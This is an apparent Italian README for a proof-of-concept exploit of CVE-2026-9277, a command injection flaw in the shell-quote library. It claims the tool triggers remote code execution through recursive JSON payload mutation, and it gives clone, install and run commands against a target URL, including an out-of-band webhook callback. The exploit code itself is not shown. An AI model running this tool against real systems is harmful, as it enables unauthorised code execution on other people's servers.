
Proof-of-concept exploit per CVE-2026-9277, una vulnerabilità di command injection nella libreria shell-quote. Esegue una traversata JSON ricorsiva con mutazione combinatoria per innescare RCE, supportando verifica OOB e registrazione a rumore zero.
Uno script exploit Proof of Concept (PoC) specializzato progettato per verificare e dimostrare CVE-2026-9277—una vulnerabilità strutturale di Command Injection trovata nelle versioni legacy della libreria shell-quote (<= 1.8.3).
Lo scanner esegue una manipolazione strutturale profonda dei payload JSON in input per esporre vettori di esecuzione remota di codice (RCE) tramite attraversamento ricorsivo, prevenendo falsi positivi utilizzando un motore dinamico di temporizzazione di rete.
{"op": "..."} dagli argomenti per bypassare con successo i controlli di isolamento delle stringhe.Assicurati di avere Python 3.10+ e i pacchetti richiesti installati:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
